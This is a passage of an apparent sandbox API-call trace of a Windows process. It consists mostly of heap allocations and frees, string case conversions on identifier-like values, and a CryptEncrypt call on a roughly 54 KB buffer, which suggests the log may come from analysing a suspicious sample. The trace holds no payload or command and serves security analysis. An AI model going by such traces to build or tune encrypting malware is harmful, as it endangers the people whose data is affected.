Size=0x10) returned 0x2aa99b8 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0103.961] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.962] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0103.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0103.962] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0103.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.964] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73aa0 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0103.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0103.964] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0103.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73aa0 | out: hHeap=0x2af0000) returned 1 [0103.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0103.966] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0103.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0103.967] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0103.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.969] CryptEncrypt (in: hKey=0x9a4480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xd499, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xd4a0) returned 1 [0103.970] CharLowerBuffW (in: lpsz="byte[54432]", cchLength=0xb | out: lpsz="byte[54432]") returned 0xb [0103.972] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.972] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.973] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, 